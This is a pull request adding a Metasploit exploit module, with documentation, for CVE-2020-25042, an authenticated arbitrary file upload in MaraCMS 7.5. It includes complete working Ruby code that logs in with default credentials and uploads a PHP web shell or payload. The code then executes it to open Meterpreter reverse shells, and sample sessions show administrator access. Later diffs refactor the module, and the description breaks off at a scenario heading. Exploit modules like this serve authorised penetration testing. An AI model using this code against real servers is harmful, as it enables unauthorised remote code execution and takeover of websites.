### PR TITLE
Add MaraCMS 7.5 Arbitrary File Upload Module and Docs (CVE-2020-25042)

### DIFF
--- a/documentation/modules/exploit/multi/http/maracms_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/maracms_upload_exec.md
@@ -1,0 +1,143 @@
+## Vulnerable Application
+This module exploits an arbitrary file upload vulnerability in MaraCMS 7.5 and prior in order to execute arbitrary commands.
+
+The module first tries to obtain the MaraCMS version from `/about.php` (for MaraCMS 7.5, the version number mentioned is `7.2`.)
+The module then visits `/?login` to obtain the `shash` token, which is required for authentication. Next,
+the module sends an HTTP POST request to `codebase/handler.php` in order to obtain the salt used by MaraCMS to create password hashes.
+The module then uses the `shash` token and the salt to create the required authentication hashes,
+and sends these via a second HTTP POST request to the handler.
+
+If authentication is successful, the module tries to upload a malicious PHP file to the web root,
+again via an HTTP POST request to `codebase/handler.php.`
+If the `php` target is selected, the payload is embedded in the uploaded file
+and the module attempts to execute the payload via an HTTP GET request to this file.
+For the `linux` and `windows` targets, the module uploads a simple PHP web shell similar to `<?php system($_GET["cmd"]); ?>`.
+Subsequently, it leverages the CmdStager mixin to deliver the final payload via a series of HTTP GET requests
+in the form of `/<php_web_shell>?<cmd>=<payload>`.
+
+Valid credentials for a MaraCMS `admin` or `manager` account are required.
+This module has been successfully tested against MaraCMS 7.5 running on Windows Server 2012 (XAMPP server).
+
+Vulnerable software for testing can be downloaded [here](https://sourceforge.net/projects/maracms/).
+Installation is just a matter of unzipping the package to a php-capable webhost.
+The requirements specified on SourceForge are an Apache or equivalent webserver (LightTPD, Nginx, etc.)
+and a PHP version from 5.3 to 7.1.1. Both of these requirements can easily be fulfilled by downloading
+an older version of XAMPP server for Windows or Linux from [here](https://sourceforge.net/projects/xampp/).
+MaraCMS does not require a database, nor an installation script.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/maracms_upload_exec`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the MaraCMS account]`
+6. Do: `set PASSWORD [password for the MaraCMS account]`
+7. Do: `set target [target]`
+8. Do: `set payload [payload]`
+9. Do: `set LHOST [IP]`
+10. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the MaraCMS account to authenticate with. The default value is `changeme`,
+as this is the default admin password for MaraCMS.
+### TARGETURI
+The base path to MaraCMS. The default value is `/`.
+### USERNAME
+The username for the MaraCMS account to authenticate with. The default value is `admin`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   PHP
+1   Linux
+2   Windows
+```
+
+## Scenarios
+### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - PHP target
+```
+msf5 exploit(multi/http/maracms_upload_exec) > show options
+
+Module options (exploit/multi/http/maracms_upload_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   changeme         yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to MaraCMS
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   admin            yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  1192.168.1.12    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+msf5 exploit(multi/http/maracms_upload_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.12 :4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
+[*] Obtained salt `9781` from server. Using salt to authenticate...
+[+] Successfully authenticated to MaraCMS
+[*] Uploading payload as zKEdBPw5j.php...
+[+] Successfully uploaded zKEdBPw5j.php
+[*] Executing the payload...
+[*] Sending stage (38288 bytes) to 192.168.1.20 
+[*] Meterpreter session 15 opened (192.168.1.12 :4444 -> 192.168.1.20 :49324) at 2020-09-22 15:30:14 -0400
+
+meterpreter > 
+[!] Deleting: zKEdBPw5j.php
+[+] zKEdBPw5j.php removed
+getuid
+Server username: Administrator (0)
+meterpreter >
+```
+### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - Windows target
+```
+msf5 exploit(multi/http/maracms_upload_exec) > run
+
+[*] Started reverse TCP handler on 1192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
+[*] Obtained salt `6521` from server. Using salt to authenticate...
+[+] Successfully authenticated to MaraCMS
+[*] Uploading payload as gCUII0Fx41Q.php...
+[+] Successfully uploaded gCUII0Fx41Q.php
+[*] Executing the payload via a series of HTTP GET requests to `/gCUII0Fx41Q.php?1xFqv=<command>`
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (201283 bytes) to 192.168.1.20
+[*] Meterpreter session 14 opened (1192.168.1.12:4444 -> 192.168.1.20:49323) at 2020-09-22 15:30:05 -0400
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+
+meterpreter > 
+[!] Deleting: gCUII0Fx41Q.php
+[+] gCUII0Fx41Q.php removed
+getuid
+Server username: WIN-S417DG9MRTR\Administrator
+meterpreter >
+```

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -139,12 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Disconnected, 'Connection failed while trying to authenticate.')
     end
 
-    unless res.code == 200 && res.body.include?('shash=')
-      fail_with(Failure::UnexpectedReply, 'Failed to obtain the `shash` token that is necessary to authenticate to the server.')
-    end
-
-    @shash = res.body.scan(/shash='(.*?)';/).flatten.first # obtain shash value from inside a <script> tag
-    unless @shash
+    unless res.code == 200 && /shash='(?<shash>.*?)';/ =~ res.body # obtain shash value from inside a <script> tag
       fail_with(Failure::Unknown, 'Failed to obtain the `shash` token that is necessary to authenticate to the server.')
     end
 
@@ -155,10 +150,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
       'cookie' => @cookie,
-      'headers' => {
-        'ctype' => 'application/x-www-form-urlencoded',
-        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}"
-      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}" },
       'vars_get' => {
         'nocache' => nocache_value
       },
@@ -190,31 +183,29 @@ class MetasploitModule < Msf::Exploit::Remote
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
     @username_base64 = Rex::Text.encode_base64(username) # this value is also used when uploading the payload
-    unsalted_hash = Digest::SHA256.hexdigest("#{password}#{@shash}#{username}")
+    unsalted_hash = Digest::SHA256.hexdigest("#{password}#{shash}#{username}")
     salted_hash = Digest::SHA256.hexdigest("#{unsalted_hash}#{salt}")
     @salted_hash_base64 = Rex::Text.encode_base64(salted_hash) # this value is also used when uploading the payload
-
-    # create data for POST request
-    data = "usr=#{@username_base64}"
-    data << "&hash=#{Rex::Text.encode_base64(unsalted_hash)}"
-    data << "&pwd=#{@salted_hash_base64}"
-    data << "&action=#{Rex::Text.encode_base64('login')}"
-    data << "&enccrc=#{Digest::SHA256.hexdigest('')}" # sha256 encoding of empty string
-    data << "&rawresponse=#{Rex::Text.encode_base64(salt_base64)}"
-    data << "&status=#{Rex::Text.encode_base64('Sending Request')}"
-
     nocache_value = rand # create new nocache_value
 
-    # authenticate via raw request to prevent unwanted encoding of `=` characters resulting from the need to base64 encode all data
-    res = send_request_raw({
+    res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'codebase', "handler.php?nocache=#{nocache_value}"),
+      'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
       'cookie' => @cookie,
-      'headers' => {
-        'Content-Type' => 'application/x-www-form-urlencoded',
-        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}"
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}" },
+      'vars_get' => {
+        'nocache' => nocache_value
       },
-      'data' => data
+      'vars_post' => {
+        'usr' => @username_base64,
+        'hash' => Rex::Text.encode_base64(unsalted_hash),
+        'pwd' => @salted_hash_base64,
+        'action' => Rex::Text.encode_base64('login').to_s,
+        'enccrc' => Digest::SHA256.hexdigest(''), # sha256 encoding of empty string
+        'rawresponse' => Rex::Text.encode_base64(salt_base64),
+        'status' => Rex::Text.encode_base64('Sending Request').to_s
+      }
     })
 
     unless res

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -1,0 +1,345 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'MaraCMS Arbitrary PHP File Upload',
+        'Description' => %q{
+          This module exploits an arbitrary file upload vulnerability in
+          MaraCMS 7.5 and prior in order to execute arbitrary commands.
+
+          The module first attempts to authenticate to MaraCMS. It then tries
+          to upload a malicious PHP file to the web root via an HTTP POST
+          request to `codebase/handler.php.` If the `php` target is selected,
+          the payload is embedded in the uploaded file and the module attempts
+          to execute the payload via an HTTP GET request to this file. For the
+          `linux` and `windows` targets, the module uploads a simple PHP web
+          shell similar to `<?php system($_GET["cmd"]); ?>`. Subsequently, it
+          leverages the CmdStager mixin to deliver the final payload via a
+          series of HTTP GET requests to the PHP web shell.
+
+          Valid credentials for a MaraCMS `admin` or `manager` account are
+          required. This module has been successfully tested against MaraCMS
+          7.5 running on Windows Server 2012 (XAMPP server).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Michele Cisternino', # aka (0blio_) - discovery and PoC
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-25042'],
+            ['EDB', '48780']
+          ],
+        'Payload' =>
+          {
+            'BadChars' => "\x00\x0d\x0a"
+          },
+        'Platform' => %w[linux win php],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PHP],
+        'Targets' =>
+          [
+            [
+              'PHP', {
+                'Arch' => [ARCH_PHP],
+                'Platform' => 'php',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Linux', {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Windows', {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Platform' => 'win',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-08-31',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to MaraCMS', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'changeme'])
+    ]
+  end
+
+  def check
+    vprint_status('Running check')
+
+    # visit /about.php to obtain MaraCMS version and cookies
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'about.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    @cookie = res.get_cookies
+
+    unless res.code == 200 && res.body.include?('Mara cms')
+      return CheckCode::Safe('Target is not a MaraCMS application.')
+    end
+
+    html = res.get_html_document
+    version_header = html.css('h1').text # obtain the h1 text, which for MaraCMS 7.5 is `Version 7.2 :: Production release`
+    version = version_header.split(' ')[1] # grab the version number
+
+    if version.blank?
+      return CheckCode::Detected('Could not determine MaraCMS version.')
+    end
+
+    version = Gem::Version.new version
+
+    unless version <= Gem::Version.new('7.2') # 7.2 is the version listed on the about page for MaraCMS 7.5
+      # MaraCMS no longer seems to be maintained, but the check below is added in case they every update it
+      return CheckCode::Safe('Target is likely MaraCMS with a version higher than 7.5 and may not be vulnerable.')
+    end
+
+    return CheckCode::Appears('Target is most likely MaraCMS with version 7.5 or lower')
+  end
+
+  def login
+    # visit login page in order to obtain `shash` value, which is necessary for authentication
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'vars_get' => { 'login' => '' }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+    end
+
+    unless res.code == 200 && res.body.include?('shash=')
+      fail_with(Failure::Unknown, 'Failed to obtain the `shash` token that is necessary to authenticate to the server.')
+    end
+
+    @shash = res.body.scan(/shash='(.*?)';/).flatten.first # obtain shash value from inside a <script> tag
+    unless @shash
+      fail_with(Failure::Unknown, 'Failed to obtain the `shash` token that is necessary to authenticate to the server.')
+    end
+
+    nocache_value = rand # when visiting the page with a browser, JS generates the nocache_value in the same manner
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
+      'cookie' => @cookie,
+      'headers' => {
+        'ctype' => 'application/x-www-form-urlencoded',
+        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}"
+      },
+      'vars_get' => {
+        'nocache' => nocache_value
+      },
+      'vars_post' => {
+        'usr' => '',
+        'hash' => '',
+        'pwd' => '',
+        'authenticated' => '',
+        'action' => Rex::Text.encode_base64('setsalt').to_s,
+        'headsection' => '',
+        'data' => '',
+        'enccrc' => Digest::SHA256.hexdigest(''), # sha256 encoding of empty string
+        'crc' => '',
+        'srcfile' => '',
+        'destfile' => '',
+        'rawresponse' => '',
+        'response' => '',
+        'status' => Rex::Text.encode_base64('Sending Request').to_s,
+        'error' => ''
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+    end
+
+    unless res.code == 200 && res.body.include?('~::~')
+      fail_with(Failure::Unknown, 'Failed to authenticate to the server. Please check your credentials.')
+    end
+
+    # obtain salt
+    salt_base64 = res.body.to_s.split('~')[2] # the base64 encoded salt is returned in the format: ~::~encoded_salt~::~
+    salt = Rex::Text.decode_base64(salt_base64)
+    print_status("Obtained salt `#{salt}` from server. Using salt to authenticate...")
+
+    # use salt to generate authentication tokens
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    @username_base64 = Rex::Text.encode_base64(username) # this value is also used when uploading the payload
+    unsalted_hash = Digest::SHA256.hexdigest("#{password}#{@shash}#{username}")
+    salted_hash = Digest::SHA256.hexdigest("#{unsalted_hash}#{salt}")
+    @salted_hash_base64 = Rex::Text.encode_base64(salted_hash) # this value is also used when uploading the payload
+
+    # create data for POST request
+    data = "usr=#{@username_base64}"
+    data << "&hash=#{Rex::Text.encode_base64(unsalted_hash)}"
+    data << "&pwd=#{@salted_hash_base64}"
+    data << '&authenticated='
+    data << "&action=#{Rex::Text.encode_base64('login')}"
+    data << '&headsection='
+    data << '&data='
+    data << "&enccrc=#{Digest::SHA256.hexdigest('')}" # sha256 encoding of empty string
+    data << '&crc='
+    data << '&srcfile='
+    data << '&destfile='
+    data << "&rawresponse=#{Rex::Text.encode_base64(salt_base64)}"
+    data << '&response='
+    data << "&status=#{Rex::Text.encode_base64('Sending Request')}"
+    data << '&error='
+
+    nocache_value = rand # create new nocache_value
+
+    # authenticate via raw request to prevent unwanted encoding of `=` characters resulting from the need to base64 encode all data
+    res = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'codebase', "handler.php?nocache=#{nocache_value}"),
+      'cookie' => @cookie,
+      'headers' => {
+        'Content-Type' => 'application/x-www-form-urlencoded',
+        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}"
+      },
+      'data' => data
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+    end
+
+    unless res.code == 200 && res.body.include?('~::~')
+      fail_with(Failure::Unknown, 'Failed to authenticate to the server. Please check your credentials.')
+    end
+
+    # obtain base64 encoded response from body and decode it
+    server_response = Rex::Text.decode_base64(res.body.to_s.split('~')[2])
+    unless server_response.include?('OK:')
+      fail_with(Failure::Unknown, "#{server_response}.")
+    end
+
+    print_good('Successfully authenticated to MaraCMS')
+  end
+
+  def upload_payload
+    # set payload according to target platform
+    if target['Platform'] == 'php'
+      pl = payload.encoded
+    else
+      @shell_cmd_name = rand_text_alphanumeric(3..6)
+      pl = "system($_GET[\"#{@shell_cmd_name}\"]);"
+    end
+
+    @payload_name = rand_text_alphanumeric(8..12) << '.php'
+    one_base64 = Rex::Text.encode_base64('1') # used twice below
+
+    # generate post data
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(one_base64.to_s, nil, nil, 'form-data; name="authenticated"')
+    post_data.add_part(Rex::Text.encode_base64('upload').to_s, nil, nil, 'form-data; name="action"')
+    post_data.add_part('10485760', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
+    post_data.add_part('filenew', nil, nil, 'form-data; name="type"')
+    post_data.add_part("<?php #{pl} ?>", 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{@payload_name}\"")
+    post_data.add_part(@username_base64.to_s, nil, nil, 'form-data; name="usr"')
+    post_data.add_part(@salted_hash_base64.to_s, nil, nil, 'form-data; name="pwd"')
+    post_data.add_part(one_base64.to_s, nil, nil, 'form-data; name="authenticated"')
+    post_data.add_part('/', nil, nil, 'form-data; name="destdir"')
+
+    print_status("Uploading payload as #{@payload_name}...")
+
+    # upload payload
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
+      'cookie' => @cookie,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}#{normalize_uri(target_uri.path, 'codebase', 'dir.php?type=filenew')}" },
+      'data' => post_data.to_s
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to upload the payload.')
+    end
+
+    unless res.code == 200 && res.body.include?("OK: #{@payload_name} uploaded.")
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
+    end
+
+    print_good("Successfully uploaded #{@payload_name}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, @payload_name),
+      'vars_get' => { @shell_cmd_name => cmd }
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Failed to execute the payload.')
+    end
+
+  end
+
+  def on_new_session(cli)
+    if cli.type != 'meterpreter'
+      print_error("No automatic cleanup for you. Please manually remove: #{@payload_name}")
+      return
+    end
+    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
+
+    begin
+      print_warning("Deleting: #{@payload_name}")
+      cli.fs.file.rm(@payload_name)
+      print_good("#{@payload_name} removed")
+    rescue StandardError
+      print_error("Unable to delete: #{@payload_name}")
+    end
+  end
+
+  def exploit
+    login
+
+    upload_payload
+
+    # For `php` targets, the payload can be executed via a simlpe GET request. For other targets, a cmdstager is necessary.
+    if target['Platform'] == 'php'
+      print_status('Executing the payload...')
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, @payload_name)
+      }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
+    else
+      print_status("Executing the payload via a series of HTTP GET requests to `/#{@payload_name}?#{@shell_cmd_name}=<command>`")
+      execute_cmdstager(background: true)
+    end
+  end
+end

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -267,6 +268,8 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, 'Failed to upload the payload.')
     end
 
+    register_file_for_cleanup(@payload_name)
+
     print_good("Successfully uploaded #{@payload_name}")
   end
 
@@ -279,23 +282,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless res && res.code == 200
       fail_with(Failure::Unknown, 'Failed to execute the payload.')
-    end
-
-  end
-
-  def on_new_session(cli)
-    if cli.type != 'meterpreter'
-      print_error("No automatic cleanup for you. Please manually remove: #{@payload_name}")
-      return
-    end
-    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
-
-    begin
-      print_warning("Deleting: #{@payload_name}")
-      cli.fs.file.rm(@payload_name)
-      print_good("#{@payload_name} removed")
-    rescue StandardError
-      print_error("Unable to delete: #{@payload_name}")
     end
   end
 

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -97,13 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('Running check')
 
     # visit /about.php to obtain MaraCMS version and cookies
-    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'about.php')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'about.php'),
+      'keep_cookies' => true
+    })
 
     unless res
       return CheckCode::Unknown('Connection failed.')
     end
-
-    @cookie = res.get_cookies
 
     unless res.code == 200 && res.body.include?('Mara cms')
       return CheckCode::Safe('Target is not a MaraCMS application.')
@@ -149,7 +150,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
-      'cookie' => @cookie,
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}" },
       'vars_get' => {
@@ -191,7 +191,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
-      'cookie' => @cookie,
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}" },
       'vars_get' => {
@@ -255,7 +254,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
-      'cookie' => @cookie,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
       'headers' => { 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}#{normalize_uri(target_uri.path, 'codebase', 'dir.php?type=filenew')}" },
       'data' => post_data.to_s

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -150,6 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     nocache_value = rand # when visiting the page with a browser, JS generates the nocache_value in the same manner
 
+    # try to obtain salt required for authentication
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'codebase', 'handler.php'),
@@ -185,12 +186,16 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless res.code == 200 && res.body.include?('~::~')
-      fail_with(Failure::Unknown, 'Failed to authenticate to the server. Please check your credentials.')
+      fail_with(Failure::Unknown, 'Unexpected response received while trying to obtain the salt required for authentication.')
     end
 
     # obtain salt
     salt_base64 = res.body.to_s.split('~')[2] # the base64 encoded salt is returned in the format: ~::~encoded_salt~::~
     salt = Rex::Text.decode_base64(salt_base64)
+    if salt.to_i == 0 # if the salt is nil or contains characters other than numbers, this will be true
+      # in case of an error, the server sends the error message, so this should be passed to the user
+      fail_with(Failure::Unknown, "Failed to obtain the salt required for authentication. The server sent the following response: #{salt}")
+    end
     print_status("Obtained salt `#{salt}` from server. Using salt to authenticate...")
 
     # use salt to generate authentication tokens
@@ -243,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # obtain base64 encoded response from body and decode it
     server_response = Rex::Text.decode_base64(res.body.to_s.split('~')[2])
     unless server_response.include?('OK:')
-      fail_with(Failure::Unknown, "#{server_response}.")
+      fail_with(Failure::NoAccess, "#{server_response}.") # if authentication fails, the server sends the error message
     end
 
     print_good('Successfully authenticated to MaraCMS')

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -136,11 +136,11 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+      fail_with(Failure::Disconnected, 'Connection failed while trying to authenticate.')
     end
 
     unless res.code == 200 && res.body.include?('shash=')
-      fail_with(Failure::Unknown, 'Failed to obtain the `shash` token that is necessary to authenticate to the server.')
+      fail_with(Failure::UnexpectedReply, 'Failed to obtain the `shash` token that is necessary to authenticate to the server.')
     end
 
     @shash = res.body.scan(/shash='(.*?)';/).flatten.first # obtain shash value from inside a <script> tag
@@ -163,30 +163,18 @@ class MetasploitModule < Msf::Exploit::Remote
         'nocache' => nocache_value
       },
       'vars_post' => {
-        'usr' => '',
-        'hash' => '',
-        'pwd' => '',
-        'authenticated' => '',
         'action' => Rex::Text.encode_base64('setsalt').to_s,
-        'headsection' => '',
-        'data' => '',
         'enccrc' => Digest::SHA256.hexdigest(''), # sha256 encoding of empty string
-        'crc' => '',
-        'srcfile' => '',
-        'destfile' => '',
-        'rawresponse' => '',
-        'response' => '',
-        'status' => Rex::Text.encode_base64('Sending Request').to_s,
-        'error' => ''
+        'status' => Rex::Text.encode_base64('Sending Request').to_s
       }
     })
 
     unless res
-      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+      fail_with(Failure::Disconnected, 'Connection failed while trying to authenticate.')
     end
 
     unless res.code == 200 && res.body.include?('~::~')
-      fail_with(Failure::Unknown, 'Unexpected response received while trying to obtain the salt required for authentication.')
+      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to obtain the salt required for authentication.')
     end
 
     # obtain salt
@@ -210,18 +198,10 @@ class MetasploitModule < Msf::Exploit::Remote
     data = "usr=#{@username_base64}"
     data << "&hash=#{Rex::Text.encode_base64(unsalted_hash)}"
     data << "&pwd=#{@salted_hash_base64}"
-    data << '&authenticated='
     data << "&action=#{Rex::Text.encode_base64('login')}"
-    data << '&headsection='
-    data << '&data='
     data << "&enccrc=#{Digest::SHA256.hexdigest('')}" # sha256 encoding of empty string
-    data << '&crc='
-    data << '&srcfile='
-    data << '&destfile='
     data << "&rawresponse=#{Rex::Text.encode_base64(salt_base64)}"
-    data << '&response='
     data << "&status=#{Rex::Text.encode_base64('Sending Request')}"
-    data << '&error='
 
     nocache_value = rand # create new nocache_value
 
@@ -238,11 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+      fail_with(Failure::Disconnected, 'Connection failed while trying to authenticate.')
     end
 
     unless res.code == 200 && res.body.include?('~::~')
-      fail_with(Failure::Unknown, 'Failed to authenticate to the server. Please check your credentials.')
+      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to authenticate to the server.')
     end
 
     # obtain base64 encoded response from body and decode it
@@ -291,7 +271,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      fail_with(Failure::Unknown, 'Connection failed while trying to upload the payload.')
+      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the payload.')
     end
 
     unless res.code == 200 && res.body.include?("OK: #{@payload_name} uploaded.")


### PR DESCRIPTION
## About 
This change adds a new module to /modules/exploits/multi/http/ that exploits an arbitrary file upload vulnerability in MaraCMS 7.5 and prior (CVE-2020-25042) in order to execute arbitrary commands. The change also adds documentation for this module. The module is based on this PoC: https://www.exploit-db.com/exploits/48780.

## Vulnerable system
MaraCMS version 7.5 (confirmed) and likely earlier versions as well.

## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/multi/http/maracms_upload_exec`
4. Do: `set RHOSTS [IP]`
5. Do: `set USERNAME [username for the MaraCMS account]`
6. Do: `set PASSWORD [password for the MaraCMS account]`
7. Do: `set target [target]`
8. Do: `set payload [payload]`
9. Do: `set LHOST [IP]`
10. Do: `exploit`

## Options
### PASSWORD
The password for the MaraCMS account to authenticate with. The default value is `changeme`, as this is the default admin password for MaraCMS.
### TARGETURI
The base path to MaraCMS. The default value is `/`.
### USERNAME
The username for the MaraCMS account to authenticate with. The default value is `admin`.

## Targets
```
Id  Name
--  ----
0   PHP
1   Linux
2   Windows
```

## Scenarios
### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - PHP target
```
